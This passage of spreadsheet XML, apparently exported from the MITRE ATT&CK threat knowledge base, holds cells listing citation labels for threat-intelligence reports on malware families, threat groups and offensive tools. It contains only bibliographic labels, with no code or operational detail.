Rabbit),(Citation: Cymmetria Patchwork),(Citation: Rancor Unit42 June 2018),(Citation: Talent-Jump Clambling February 2020),(Citation: Medium KONNI Jan 2020),(Citation: ESET Sednit Part 3),(Citation: Github UACMe),(Citation: Palo Alto Shamoon Nov 2016),(Citation: MalwareBytes LazyScripter Feb 2021),(Citation: CISA AR18-352A Quasar RAT December 2018),(Citation: ESET InvisiMole June 2020),(Citation: Forcepoint Monsoon),(Citation: cobaltstrike manual),(Citation: Talos Lokibot Jan 2021),(Citation: Github UACMe)</t>
  </si>
  <si>
    <t>(Citation: Carbon Black Shlayer Feb 2019),</t>
  </si>
  <si>
    <t>(Citation: OSX Keydnap malware),(Citation: ANSSI Sandworm January 2021),</t>
  </si>
  <si>
    <t>(Citation: hexed osx.dok analysis 2019),(Citation: objsee mac malware 2017),(Citation: Cobalt Strike Manual 4.3 November 2020),</t>
  </si>
  <si>
    <t>(Citation: Crowdstrike DriveSlayer February 2022),(Citation: Qualys Hermetic Wiper March 2022),(Citation: GitHub PoshC2),(Citation: McAfee Cuba April 2021),(Citation: CrowdStrike Ryuk January 2019),(Citation: Kaspersky Duqu 2.0),(Citation: Bishop Fox Sliver Framework August 2019),(Citation: Trend Micro KillDisk 2),(Citation: Malwarebytes Kimsuky June 2021),(Citation: Baumgartner Naikon 2015),(Citation: CrowdStrike SUNSPOT Implant January 2021),(Citation: Github PowerShell Empire),(Citation: FireEye FIN6 Apr 2019),(Citation: ESET Gelsemium June 2021),(Citation: IBM MegaCortex),(Citation: GitHub Sliver C2),(Citation: RedCanary Mockingbird May 2020),(Citation: PowerSploit Documentation),(Citation: GitHub PowerSploit May 2012),(Citation: Symantec Hydraq Jan 2010),(Citation: Microsoft Replace Process Token),(Citation: Microsoft Create Token),(Citation: Microsoft runas)</t>
  </si>
  <si>
    <t>(Citation: Novetta Blockbuster Tools),(Citation: Medium KONNI Jan 2020),(Citation: McAfee Bankshot),(Citation: Talos ZxShell Oct 2014),(Citation: CheckPoint Naikon May 2020),(Citation: GitHub PoshC2),(Citation: Malwarebytes Konni Aug 2021),(Citation: Cisco Ukraine Wipers January 2022),(Citation: ESET Turla PowerShell May 2019),(Citation: ESET PipeMon May 2020),(Citation: Novetta Blockbuster),(Citation: Github PowerShell Empire),(Citation: Secureworks REvil September 2019),(Citation: Unit42 Azorult Nov 2018),(Citation: Microsoft Replace Process Token),(Citation: Microsoft Create Token),(Citation: Microsoft runas)</t>
  </si>
  <si>
    <t>(Citation: cobaltstrike manual),(Citation: Microsoft Replace Process Token),(Citation: Microsoft Create Token),(Citation: Microsoft runas)</t>
  </si>
  <si>
    <t>(Citation: ESET PipeMon May 2020),(Citation: Cobalt Strike Manual 4.3 November 2020),(Citation: CobaltStrike Daddy May 2017),(Citation: Malwarebytes Konni Aug 2021),</t>
  </si>
  <si>
    <t>(Citation: AdSecurity Kerberos GT Aug 2015),(Citation: Github PowerShell Empire),(Citation: Adsecurity Mimikatz Guide),(Citation: Microsoft SID Filtering Quarantining Jan 2009),(Citation: Microsoft Trust Considerations Nov 2014),(Citation: Microsoft Netdom Trust Sept 2012),(Citation: AdSecurity Kerberos GT Aug 2015)</t>
  </si>
  <si>
    <t>(Citation: FireEye Op RussianDoll),(Citation: Microsoft FinFisher March 2018),(Citation: CheckPoint Naikon May 2020),(Citation: Cobalt Strike Manual 4.3 November 2020),(Citation: McAfee Shamoon December 2018),(Citation: McAfee Sodinokibi October 2019),(Citation: GitHub SILENTTRINITY Modules July 2019),(Citation: Bitdefender FIN8 July 2021),(Citation: GitHub Pupy),(Citation: FinFisher Citation),(Citation: Symantec W.32 Stuxnet Dossier),(Citation: Tarrask scheduled task),(Citation: Unit 42 Siloscape Jun 2021),(Citation: cobaltstrike manual),(Citation: Crowdstrike Indrik November 2018),(Citation: ESET Okrum July 2019),(Citation: Microsoft Replace Process Token),(Citation: Microsoft Create Token),(Citation: Microsoft runas)</t>
  </si>
  <si>
    <t>(Citation: Unit42 LockerGoga 2019),(Citation: Check Point Meteor Aug 2021),(Citation: IBM MegaCortex),(Citation: MSTIC DEV-0537 Mar 2022),(Citation: CarbonBlack LockerGoga 2019),</t>
  </si>
  <si>
    <t>(Citation: Volexity SolarWinds),(Citation: trendmicro xcsset xcode project 2020),(Citation: FOX-IT May 2016 Mofang),(Citation: UCF STIG Elevation Account Enumeration)</t>
  </si>
  <si>
    <t>(Citation: AADInternals Documentation),(Citation: MSTIC Nobelium Oct 2021),(Citation: Roadtools),</t>
  </si>
  <si>
    <t>(Citation: Cybereason OperationCuckooBees May 2022),(Citation: Cycraft Chimera April 2020),(Citation: Red Canary Hospital Thwarted Ryuk October 2020),(Citation: GitHub PoshC2),(Citation: TechNet Dsquery),(Citation: Symantec W.32 Stuxnet Dossier),(Citation: ESET Lazarus Jun 2020),(Citation: ESET ComRAT May 2020),(Citation: MSTIC Nobelium Toolset May 2021),(Citation: CISA SoreFang July 2016),(Citation: AlienVault Sykipot 2011),(Citation: Cybereason Valak May 2020),(Citation: DFIR Ryuk's Return October 2020),(Citation: Microsoft Net),(Citation: FireEye Ryuk and Trickbot January 2019),(Citation: NCC Group Team9 June 2020),(Citation: ESET Telebots Dec 2016),(Citation: Secureworks IRON RITUAL Profile),(Citation: Github PowerShell Empire),(Citation: FireEye FIN6 Apr 2019),(Citation: Cybereason Bumblebee August 2022),(Citation: CrowdStrike BloodHound April 2018),(Citation: FireEye APT34 Dec 2017),(Citation: Secureworks BRONZE BUTLER Oct 2017),(Citation: FireEye FIN6 April 2016),(Citation: GitHub SILENTTRINITY Modules July 2019),(Citation: CME Github September 2018),(Citation: IBM IcedID November 2017),(Citation: MSTIC DEV-0537 Mar 2022),(Citation: Palo Alto OilRig May 2016),(Citation: Kaspersky Poseidon Group),(Citation: SecureWorks August 2019),(Citation: Trend Micro Muddy Water March 2021),(Citation: Mandiant Operation Ke3chang November 2014),(Citation: CISA AA20-259A Iran-Based Actor September 2020),(Citation: FoxIT Wocao December 2019),(Citation: Symantec Bumblebee June 2022),(Citation: McAfee Bankshot),(Citation: Cyberreason Anchor December 2019),(Citation: US-CERT TA18-074A),(Citation: PWC Cloud Hopper Technical Annex April 2017),(Citation: CrowdStrike StellarParticle January 2022),(Citation: Symantec Buckeye),(Citation: CrowdStrike IceApple May 2022),(Citation: NCC Group Chimera January 2021),(Citation: UCF STIG Elevation Account Enumeration)</t>
  </si>
  <si>
    <t>(Citation: SensePost Ruler GitHub),(Citation: Black Hills Attacking Exchange MailSniper, 2016),(Citation: DFIR Report APT35 ProxyShell March 2022),(Citation: BiZone Lizar May 2021),(Citation: Trend Micro TA505 June 2019),(Citation: IBM IcedID November 2017),(Citation: CIS Emotet Dec 2018),(Citation: Trend Micro Trickbot Nov 2018),(Citation: Symantec Dragonfly),(Citation: MSTIC Nobelium Toolset May 2021),(Citation: ESET Grandoreiro April 2020),(Citation: ESET Telebots July 2017),</t>
  </si>
  <si>
    <t>(Citation: Cybereason OperationCuckooBees May 2022),(Citation: DigiTrust Agent Tesla Jan 2017),(Citation: ESET InvisiMole June 2018),(Citation: GitHub PoshC2),(Citation: Lotus Blossom Jun 2015),(Citation: GitHub Pupy),(Citation: Symantec W.32 Stuxnet Dossier),(Citation: Morphisec ShellTea June 2019),(Citation: S2 Grupo TrickBot June 2017),(Citation: ESET ComRAT May 2020),(Citation: Cybereason Valak May 2020),(Citation: Palo Alto Comnie),(Citation: F-Secure The Dukes),(Citation: CISA SoreFang July 2016),(Citation: SecureWorks BRONZE UNION June 2017),(Citation: NCC Group Team9 June 2020),(Citation: Mandiant APT1),(Citation: Symantec W32.Duqu),(Citation: Palo Alto CVE-2015-3113 July 2015),(Citation: Checkpoint MosesStaff Nov 2021),(Citation: Crowdstrike Indrik November 2018),(Citation: Github PowerShell Empire),(Citation: Symantec Orangeworm April 2018),(Citation: CrowdStrike BloodHound April 2018),(Citation: ESET Crutch December 2020),(Citation: Cybereason Cobalt Kitty 2017),(Citation: Kaspersky ProjectSauron Technical Analysis),(Citation: Kaspersky Turla Aug 2014),(Citation: ClearSky Siamesekitten August 2021),(Citation: Palo Alto OilRig May 2016),(Citation: Kaspersky Poseidon Group),(Citation: Unit 42 Kazuar May 2017),(Citation: Savill 1999),(Citation: Mandiant Operation Ke3chang November 2014),(Citation: FireEye admin@338),(Citation: CISA AA20-259A Iran-Based Actor September 2020),(Citation: FireEye SMOKEDHAM June 2021),(Citation: Cylance Dust Storm),(Citation: Accenture HyperStack October 2020),(Citation: McAfee Bankshot),(Citation: FireEye Periscope March 2018),(Citation: PowerSploit Documentation),(Citation: RATANKBA),(Citation: ANSSI Sandworm January 2021),(Citation: GitHub PowerSploit May 2012),(Citation: TrendMicro Tropic Trooper May 2020),(Citation: Symantec Buckeye),(Citation: Trend Micro Trickbot Nov 2018),(Citation: FireEye MuddyWater Mar 2018),(Citation: Malwarebytes Pony April 2016),(Citation: NCC Group Chimera January 2021),(Citation: UCF STIG Elevation Account Enumeration)</t>
  </si>
  <si>
    <t>(Citation: Symantec Calisto July 2018),(Citation: US-CERT TA18-074A),(Citation: Metcalf 2015),(Citation: Adsecurity Mimikatz Guide),(Citation: Dragos Crashoverride 2018),(Citation: KISA Operation Muzabi),(Citation: Novetta Blockbuster Destructive Malware),(Citation: aptsim),(Citation: Novetta Blockbuster),(Citation: FireEye SMOKEDHAM June 2021),</t>
  </si>
  <si>
    <t>(Citation: CrowdStrike StellarParticle January 2022),(Citation: Microsoft - Customer Guidance on Recent Nation-State Cyber Attacks),(Citation: Expel IO Evil in AWS)</t>
  </si>
  <si>
    <t>(Citation: MSTIC DEV-0537 Mar 2022),(Citation: CrowdStrike StellarParticle January 2022),</t>
  </si>
  <si>
    <t>(Citation: Volexity SolarWinds),(Citation: Cybersecurity Advisory GRU Brute Force Campaign July 2021),(Citation: FireEye APT35 2018),(Citation: MSTIC Nobelium Oct 2021),(Citation: Microsoft - Customer Guidance on Recent Nation-State Cyber Attacks),(Citation: Gmail Delegation)</t>
  </si>
  <si>
    <t>(Citation: Volexity SolarWinds),(Citation: AADInternals Documentation),(Citation: CISA MFA PrintNightmare),(Citation: Microsoft - Device Registration)</t>
  </si>
  <si>
    <t>(Citation: Aqua TeamTNT August 2020),(Citation: Cisco Talos Intelligence Group),(Citation: trendmicro xcsset xcode project 2020),(Citation: MacKeeper Bundlore Apr 2019),(Citation: TrendMicro EarthLusca 2022),(Citation: Trend Micro Skidmap),</t>
  </si>
  <si>
    <t>,</t>
  </si>
  <si>
    <t>(Citation: Novetta-Axiom),(Citation: Zscaler Lyceum DnsSystem June 2022),</t>
  </si>
  <si>
    <t>(Citation: FireEye APT28),(Citation: Cybereason Kimsuky November 2020),(Citation: Recorded Future REDDELTA July 2020),(Citation: Google EXOTIC LILY March 2022),(Citation: CISA AA21-200A APT40 July 2021),(Citation: US District Court Indictment GRU Unit 74455 October 2020),(Citation: Proofpoint Operation Transparent Tribe March 2016),(Citation: DOJ APT10 Dec 2018),(Citation: District Court of NY APT10 Indictment December 2018),(Citation: Korean FSI TA505 2020),(Citation: Dragos Hexane),(Citation: Kaspersky Winnti April 2013),(Citation: eSentire FIN7 July 2021),(Citation: KISA Operation Muzabi),(Citation: ESET Lazarus Jun 2020),(Citation: Accenture MUDCARP March 2019),(Citation: Palo Alto Black-T October 2020),(Citation: Checkpoint IndigoZebra July 2021),(Citation: Secureworks BRONZE PRESIDENT December 2019),(Citation: Malwarebytes Kimsuky June 2021),(Citation: MSTIC NOBELIUM May 2021),(Citation: CISA AA20-301A Kimsuky),(Citation: CISA AppleJeus Feb 2021),(Citation: ThreatConnect Kimsuky September 2020),(Citation: Mandiant APT1),(Citation: MSTIC NOBELIUM Mar 2021),(Citation: CISA AA20-296A Berserk Bear December 2020),(Citation: TrendMicro EarthLusca 2022),(Citation: ESET Operation Spalax Jan 2021),(Citation: Talos Transparent Tribe May 2021),(Citation: Forcepoint BITTER Pakistan Oct 2016),(Citation: Microsoft Actinium February 2022),(Citation: Proofpoint TA407 September 2019),(Citation: Unit 42 Gamaredon February 2022),(Citation: McAfee Honeybee),(Citation: Cisco Talos Transparent Tribe Education Campaign July 2022),(Citation: FireEye SUNSHUTTLE Mar 2021),(Citation: McAfee Dianxun March 2021),(Citation: ClearSky Siamesekitten August 2021),(Citation: Zdnet Kimsuky Group September 2020),(Citation: SecureWorks August 2019),(Citation: Mandiant UNC3890 Aug 2022),(Citation: Certfa Charming Kitten January 2021),(Citation: Microsoft Targeting Elections September 2020),(Citation: Google TAG Lazarus Jan 2021),(Citation: Kaspersky Ferocious Kitten Jun 2021),(Citation: Cylance Dust Storm),(Citation: US District Court Indictment GRU Oct 2018),(Citation: Volexity Ocean Lotus November 2020),(Citation: Phish Labs Silent Librarian),(Citation: DOJ Iran Indictments March 2018),(Citation: Secureworks COBALT DICKENS September 2019),(Citation: Secureworks COBALT DICKENS August 2018),(Citation: BlackBerry CostaRicto November 2020),(Citation: Bitdefender FunnyDream Campaign November 2020),(Citation: MalwareBytes LazyScripter Feb 2021),(Citation: Malwarebytes Silent Librarian October 2020),(Citation: Google TAG Ukraine Threat Landscape March 2022),</t>
  </si>
  <si>
    <t>(Citation: US District Court Indictment GRU Unit 74455 October 2020),(Citation: McAfee Honeybee),(Citation: McAfee Night Dragon),(Citation: KISA Operation Muzabi),(Citation: TrendMicro EarthLusca 2022),(Citation: ESET Lazarus Jun 2020),(Citation: FoxIT Wocao December 2019),(Citation: Microsoft GALLIUM December 2019),</t>
  </si>
  <si>
    <t>(Citation: FireEye TRITON 2019),(Citation: Novetta-Axiom),(Citation: MSTIC DEV-0537 Mar 2022),(Citation: Gigamon Berserk Bear October 2021),(Citation: Microsoft HAFNIUM March 2020),</t>
  </si>
  <si>
    <t>(Citation: Google Election Threats October 2020),(Citation: Checkpoint IndigoZebra July 2021),(Citation: CISA AppleJeus Feb 2021),(Citation: MSTIC NOBELIUM May 2021),(Citation: TrendMicro Confucius APT Feb 2018),(Citation: Anomali Static Kitten February 2021),(Citation: Talos Kimsuky Nov 2021),(Citation: TrendMicro EarthLusca 2022),(Citation: Microsoft HAFNIUM March 2020),(Citation: ClearSky Lazarus Aug 2020),(Citation: ESET Crutch December 2020),(Citation: FireEye APT17),(Citation: Trend Micro Muddy Water March 2021),(Citation: Microsoft POLONIUM June 2022),(Citation: Volexity Ocean Lotus November 2020),(Citation: HackerNews IndigoZebra July 2021),(Citation: McAfee Sharpshooter December 2018),(Citation: Zscaler APT31 Covid-19 October 2020),(Citation: MalwareBytes LazyScripter Feb 2021),(Citation: Google TAG Ukraine Threat Landscape March 2022),(Citation: Check Point APT35 CharmPower January 2022),(Citation: FireEye APT29),</t>
  </si>
  <si>
    <t>(Citation: Trend Micro TeamTNT),</t>
  </si>
  <si>
    <t>(Citation: TrendMicro Pawn Storm 2019),(Citation: Cybersecurity Advisory SVR TTP May 2021),(Citation: US District Court Indictment GRU Unit 74455 October 2020),(Citation: CheckPoint Volatile Cedar March 2015),(Citation: CISA AA20-296A Berserk Bear December 2020),(Citation: TrendMicro EarthLusca 2022),(Citation: Check Point APT35 CharmPower January 2022),(Citation: CrowdStrike AQUATIC PANDA December 2021),(Citation: ClearSky Lebanese Cedar Jan 2021),(Citation: Trend Micro TeamTNT),</t>
  </si>
  <si>
    <t>(Citation: ClearSky Lebanese Cedar Jan 2021),</t>
  </si>
  <si>
    <t>(Citation: CheckPoint Dok),(Citation: objsee mac malware 2017),(Citation: CISA AA20-301A Kimsuky),</t>
  </si>
  <si>
    <t>(Citation: Cylance Cleaver),(Citation: Cisco ARP Poisoning Mitigation 2016),(Citation: Juniper DAI 2020)</t>
  </si>
  <si>
    <t>,(Citation: dhcp_serv_op_events),(Citation: ntlm_relaying_kerberos_del)</t>
  </si>
  <si>
    <t>(Citation: GitHub PoshC2),(Citation: Impacket Tools),(Citation: GitHub Responder),(Citation: GitHub Pupy),(Citation: GitHub Inveigh),(Citation: Github PowerShell Empire),(Citation: FireEye KEGTAP SINGLEMALT October 2020),(Citation: Kaspersky ThreatNeedle Feb 2021),(Citation: byt3bl33d3r NTLM Relaying),(Citation: Microsoft SMB Packet Signing),(Citation: Secure Ideas SMB Relay),(Citation: ADSecurity Windows Secure Baseline)</t>
  </si>
  <si>
    <t>(Citation: Kaspersky Regin),(Citation: Talos Cobalt Strike September 2020),(Citation: US-CERT TA18-074A),(Citation: Symantec W32.Duqu),(Citation: Trend Micro DRBControl February 2020),(Citation: Unit 42 Magic Hound Feb 2017),(Citation: Unit 42 Lucifer June 2020),(Citation: Unit 42 Siloscape Jun 2021),(Citation: cobaltstrike manual),(Citation: Unit 42 Hildegard Malware),(Citation: Talos Rocke August 2018),(Citation: Trend Micro TeamTNT),</t>
  </si>
  <si>
    <t>(Citation: PaloAlto DNS Requests May 2016),(Citation: Cybereason Oceanlotus May 2017),(Citation: Check Point APT34 April 2021),(Citation: NCSC APT29 July 2020),(Citation: BitDefender Chafer May 2020),(Citation: Zscaler Cobian Aug 2017),(Citation: DHS CISA AA22-055A MuddyWater February 2022),(Citation: Bishop Fox Sliver Framework August 2019),(Citation: CYBERCOM Iranian Intel Cyber January 2022),(Citation: PTSecurity Cobalt Dec 2016),(Citation: ESET Ebury Feb 2014),(Citation: FireEye APT32 May 2017),(Citation: Talos Cobalt Strike September 2020),(Citation: Cybersecurity Advisory SVR TTP May 2021),(Citation: SentinelOne Aoqin Dragon June 2022),(Citation: ThreatStream Evasion Analysis),(Citation: Kaspersky Lyceum October 2021),(Citation: FireEye SUNBURST Backdoor December 2020),(Citation: Securelist Denis April 2017),(Citation: Medium Anchor DNS July 2020),(Citation: Group IB Cobalt Aug 2017),(Citation: FireEye APT41 Aug 2019),(Citation: Talos Cobalt Group July 2018),(Citation: Cisco DNSMessenger March 2017),(Citation: Accenture Lyceum Targets November 2021),(Citation: Palo Alto OilRig Sep 2018),(Citation: ESET Gelsemium June 2021),(Citation: Objective See Green Lambert for OSX Oct 2021),(Citation: FireEye APT34 Webinar Dec 2017),(Citation: Cybereason Cobalt Kitty 2017),(Citation: Mythc Documentation),(Citation: Cobalt Strike Manual 4.3 November 2020),(Citation: fsecure NanHaiShu July 2016),(Citation: FireEye APT34 Dec 2017),(Citation: Kaspersky ProjectSauron Technical Analysis),(Citation: PWC WellMess July 2020),(Citation: NCC Group APT15 Alive and Strong),(Citation: ClearSky Siamesekitten August 2021),(Citation: Kaspersky ShadowPad Aug 2017),(Citation: SecureWorks August 2019),(Citation: Palo Alto OilRig May 2016),(Citation: Unit42 RDAT July 2020),(Citation: Unit 42 Playbook Dec 2017),(Citation: Kaspersky ProjectSauron Full Report),(Citation: FireEye FiveHands April 2021),(Citation: Unit 42 QUADAGENT July 2018),(Citation: ClearSky Wilted Tulip July 2017),(Citation: GitHub Sliver C2 DNS),(Citation: Zscaler Lyceum DnsSystem June 2022),(Citation: Cyberreason Anchor December 2019),(Citation: FireEye FIN7 March 2017),(Citation: Symantec Remsec IOCs),(Citation: Glitch-Cat Green Lambert ATTCK Oct 2021),(Citation: FireEye FIN7 Aug 2018),(Citation: BlackBerry CostaRicto November 2020),(Citation: Group IB APT 41 June 2021),(Citation: MalwareBytes LazyScripter Feb 2021),(Citation: TrendMicro Tropic Trooper May 2020),(Citation: CopyKittens Nov 2015),(Citation: ESET InvisiMole June 2020),(Citation: FireEye APT34 July 2019),(Citation: Palo Alto DNS Requests),(Citation: Dell TG-3390),(Citation: cobaltstrike manual),(Citation: NCC Group Chimera January 2021),</t>
  </si>
  <si>
    <t>(Citation: Talos ZxShell Oct 2014),(Citation: Mythc Documentation),(Citation: Unit 42 NOKKI Sept 2018),(Citation: ESET Machete July 2019),(Citation: Microsoft PLATINUM April 2016),(Citation: McAfee Honeybee),(Citation: Unit42 SilverTerrier 2018),(Citation: VirusBulletin Kimsuky October 2019),(Citation: Talos PoetRAT October 2020),(Citation: Unit 42 CARROTBAT November 2018),(Citation: FireEye APT41 March 2020),(Citation: Kaspersky ShadowPad Aug 2017),(Citation: 360 Machete Sep 2020),(Citation: Unit 42 Kazuar May 2017),(Citation: Unit 42 CARROTBAT January 2020),(Citation: ESET Attor Oct 2019),(Citation: Cylance Machete Mar 2017),(Citation: XAgentOSX 2017),</t>
  </si>
  <si>
    <t>(Citation: FireEye APT28),(Citation: DigiTrust Agent Tesla Jan 2017),(Citation: Cybereason Oceanlotus May 2017),(Citation: Cybersecurity Advisory GRU Brute Force Campaign July 2021),(Citation: Palo Alto Sofacy 06-2018),(Citation: Accenture SNAKEMACKEREL Nov 2018),(Citation: ESET ComRAT May 2020),(Citation: ESET Zebrocy May 2019),(Citation: ESET LightNeuron May 2019),(Citation: Unit42 Cannon Nov 2018),(Citation: CISA AA20-301A Kimsuky),(Citation: Bitdefender Agent Tesla April 2020),(Citation: Talos NavRAT May 2018),(Citation: Unit42 Sofacy Dec 2018),(Citation: ESET Sednit Part 2),(Citation: Cybereason Cobalt Kitty 2017),(Citation: Kaspersky ProjectSauron Technical Analysis),(Citation: Crowdstrike GTR2020 Mar 2020),(Citation: Mandiant UNC3890 Aug 2022),(Citation: Unit 42 BadPatch Oct 2017),(Citation: Unit42 RDAT July 2020),(Citation: Kaspersky ProjectSauron Full Report),(Citation: Symantec Remsec IOCs),(Citation: Microsoft PLATINUM April 2016),(Citation: Unit42 SilverTerrier 2018),(Citation: Fortinet Agent Tesla June 2017),(Citation: Microsoft SIR Vol 19),(Citation: ESET Zebrocy Nov 2018),</t>
  </si>
  <si>
    <t>(Citation: Palo Alto Reaver Nov 2017),(Citation: Trend Micro njRAT 2018),(Citation: Trend Micro Qakbot May 2020),(Citation: McAfee Gold Dragon),(Citation: ESET Gelsemium June 2021),(Citation: Volexity SolarWinds),(Citation: FireEye APT34 Webinar Dec 2017),(Citation: Kaspersky ProjectSauron Technical Analysis),(Citation: Trusteer Carberp October 2010),(Citation: NCC Group APT15 Alive and Strong),(Citation: TrendMicro Taidoor),(Citation: Unit 42 BadPatch Oct 2017),(Citation: Unit 42 Playbook Dec 2017),(Citation: MSTIC FoggyWeb September 2021),(Citation: Kaspersky QakBot September 2021),(Citation: objsee mac malware 2017),(Citation: Palo Alto Unit 42 OutSteel SaintBot February 2022 ),(Citation: Palo Alto Networks BBSRAT),(Citation: CYBERCOM Iranian Intel Cyber January 2022),(Citation: Cylance Machete Mar 2017),(Citation: Palo Alto Comnie),(Citation: US-CERT BLINDINGCAN Aug 2020),(Citation: FireEye Ursnif Nov 2017),(Citation: McAfee Night Dragon),(Citation: Malwarebytes Dyreza November 2015),(Citation: Cybereason Bazar July 2020),(Citation: Mythc Documentation),(Citation: Unit 42 Magic Hound Feb 2017),(Citation: GitHub Sliver C2),(Citation: JPCert TSCookie March 2018),(Citation: Rancor Unit42 June 2018),(Citation: IBM TA505 April 2020),(Citation: FireEye APT41 March 2020),(Citation: FireEye APT34 July 2019),(Citation: ESET Zebrocy Nov 2018),(Citation: ESET Sednit Part 1),(Citation: FireEye APT29),(Citation: Talos Frankenstein June 2019),(Citation: FireEye APT10 Sept 2018),(Citation: Proofpoint Operation Transparent Tribe March 2016),(Citation: Secureworks BRONZE PRESIDENT December 2019),(Citation: SentinelOne Aoqin Dragon June 2022),(Citation: Unit42 SUPERNOVA Dec 2020),(Citation: Securelist APT10 March 2021),(Citation: ESET Telebots Dec 2016),(Citation: Group IB Cobalt Aug 2017),(Citation: wardle evilquest partii),(Citation: Red Canary NETWIRE January 2020),(Citation: Trend Micro Tick November 2019),(Citation: ClearSky Lazarus Aug 2020),(Citation: Unit 42 WhisperGate January 2022),(Citation: FireEye APT34 Dec 2017),(Citation: ESET Nomadic Octopus 2018),(Citation: CheckPoint Naikon May 2020),(Citation: Unit 42 Inception November 2018),(Citation: ESET Gazer Aug 2017),(Citation: Moran 2013),(Citation: Talos Zeus Panda Nov 2017),(Citation: Unit 42 Kazuar May 2017),(Citation: Mandiant UNC3890 Aug 2022),(Citation: CERT-EE Gamaredon January 2021),(Citation: Kaspersky Ferocious Kitten Jun 2021),(Citation: Mandiant UNC3313 Feb 2022),(Citation: FireEye APT19),(Citation: FBI FLASH APT39 September 2020),(Citation: objective-see windtail2 jan 2019),(Citation: GitHub PoshC2),(Citation: FireEye FELIXROOT July 2018),(Citation: ESET Dukes October 2019),(Citation: ESET Turla Mosquito May 2018),(Citation: JPCert PLEAD Downloader June 2018),(Citation: JPCERT ChChes Feb 2017),(Citation: Cylance Sodinokibi July 2019),(Citation: ESET BackdoorDiplomacy Jun 2021),(Citation: Security Intelligence More Eggs Aug 2019),(Citation: Donut Github),(Citation: Anomali Pirate Panda April 2020),(Citation: Palo Alto menuPass Feb 2017),(Citation: Lookout Dark Caracal Jan 2018),(Citation: Unit42 Xbash Sept 2018),(Citation: Fidelis INOCNATION),(Citation: NCC Group Chimera January 2021),(Citation: CheckPoint SpeakUp Feb 2019),(Citation: ESET InvisiMole June 2018),(Citation: McAfee Lazarus Nov 2020),(Citation: Secureworks Karagany July 2019),(Citation: Proofpoint TA416 Europe March 2022),(Citation: KISA Operation Muzabi),(Citation: PTSecurity Cobalt Dec 2016),(Citation: NCCGroup RokRat Nov 2018),(Citation: NorthSec 2015 GData Uroburos Tools),(Citation: Baumgartner Naikon 2015),(Citation: Lazarus RATANKBA),(Citation: Unit42 Sofacy Dec 2018),(Citation: Intel 471 REvil March 2020),(Citation: F-Secure BlackEnergy 2014),(Citation: Kaspersky Cloud Atlas August 2019),(Citation: MalwareBytes SideCopy Dec 2021),(Citation: Rewterz Sidewinder APT April 2020),(Citation: Mandiant APT1 Appendix),(Citation: ESET Crutch December 2020),(Citation: Lazarus APT January 2022),(Citation: Proofpoint LookBack Malware Aug 2019),(Citation: Malwarebytes SmokeLoader 2016),(Citation: ESET TeleBots Oct 2018),(Citation: RATANKBA),(Citation: Unit42 SilverTerrier 2018),(Citation: Bitdefender FunnyDream Campaign November 2020),(Citation: Bitdefender StrongPity June 2020),(Citation: Trend Micro Cyclops Blink March 2022),(Citation: Talos Promethium June 2020),(Citation: McAfee GhostSecret),(Citation: 360 Machete Sep 2020),(Citation: Profero APT27 December 2020),(Citation: Unit 42 VERMIN Jan 2018),(Citation: Lotus Blossom Dec 2015),(Citation: Github PowerShell Empire),(Citation: Intezer TeamTNT September 2020),(Citation: Unit 42 OopsIE! Feb 2018),(Citation: Unit 42 Valak July 2020),(Citation: McAfee Sodinokibi October 2019),(Citation: McAfee Dianxun March 2021),(Citation: Novetta Winnti April 2015),(Citation: Kaspersky ShadowPad Aug 2017),(Citation: Microsoft POLONIUM June 2022),(Citation: Cylance Dust Storm),(Citation: Symantec Remsec IOCs),(Citation: Anomali Rocke March 2019),(Citation: Chronicle Winnti for Linux May 2019),(Citation: Palo Alto Gamaredon Feb 2017),(Citation: Trend Micro Iron Tiger April 2021),(Citation: Bishop Fox Sliver Framework August 2019),(Citation: Palo Alto Sofacy 06-2018),(Citation: FireEye HIKIT Rootkit Part 2),(Citation: Malwarebytes Higaisa 2020),(Citation: ESET Zebrocy May 2019),(Citation: Talos ROKRAT),(Citation: Unit 42 Sofacy Feb 2018),(Citation: Talos Group123),(Citation: Lab52 WIRTE Apr 2019),(Citation: Talos Kimsuky Nov 2021),(Citation: Unit 42 NETWIRE April 2020),(Citation: FireEye APT30),(Citation: ESET Grandoreiro April 2020),(Citation: Volexity OceanLotus Nov 2017),(Citation: Cybereason Cobalt Kitty 2017),(Citation: PWC WellMess July 2020),(Citation: Prevailion DarkWatchman 2021),(Citation: Bitdefender FIN8 July 2021),(Citation: ATT Sidewinder January 2021),(Citation: MacKeeper Bundlore Apr 2019),(Citation: Unit 42 Bisonal July 2018),(Citation: ESET Industroyer),(Citation: FireEye admin@338),(Citation: FireEye HAWKBALL Jun 2019),(Citation: McAfee Sharpshooter December 2018),(Citation: Trend Micro MacOS Backdoor November 2020),(Citation: ANSSI Sandworm January 2021),(Citation: Trend Micro TeamTNT),(Citation: Cybereason Kimsuky November 2020),(Citation: NCSC Cyclops Blink February 2022),(Citation: Kaspersky Dridex May 2017),(Citation: Unit 42 MechaFlounder March 2019),(Citation: Moran 2014),(Citation: reed thiefquest ransomware analysis),(Citation: ESET GreyEnergy Oct 2018),(Citation: Symantec W.32 Stuxnet Dossier),(Citation: ClearSky Charming Kitten Dec 2017),(Citation: ESET ComRAT May 2020),(Citation: F-Secure The Dukes),(Citation: Secureworks REvil September 2019),(Citation: DustySky),(Citation: Kaspersky Lyceum October 2021),(Citation: Checkpoint Dridex Jan 2021),(Citation: Talos Cobalt Group July 2018),(Citation: Cado Security TeamTNT Worm August 2020),(Citation: JPCert BlackTech Malware September 2019),(Citation: Malwarebytes RokRAT VBA January 2021),(Citation: Sofacy Komplex Trojan),(Citation: FireEye SUNSHUTTLE Mar 2021),(Citation: Palo Alto OilRig May 2016),(Citation: FireEye APT38 Oct 2018),(Citation: Unit 42 QUADAGENT July 2018),(Citation: Cyberreason Anchor December 2019),(Citation: McAfee Lazarus Jul 2020),(Citation: Secureworks GandCrab and REvil September 2019),(Citation: Microsoft SIR Vol 19),(Citation: McAfee Maze March 2020),(Citation: Proofpoint TA505 Jan 2019),(Citation: CISA MAR SLOTHFULMEDIA October 2020),(Citation: Cybereason OperationCuckooBees May 2022),(Citation: Talos ZxShell Oct 2014),(Citation: Kaspersky Tomiris Sep 2021),(Citation: Check Point APT34 April 2021),(Citation: Cybereason Valak May 2020),(Citation: Unit 42 Nokki Oct 2018),(Citation: PWC WellMess C2 August 2020),(Citation: FireEye APT33 Guardrail),(Citation: CISA WellMess July 2020),(Citation: Secureworks MCMD July 2019),(Citation: Kaspersky Carbanak),(Citation: McAfee Bankshot),(Citation: FireEye Periscope March 2018),(Citation: ESET Gamaredon June 2020),(Citation: Fortinet Agent Tesla June 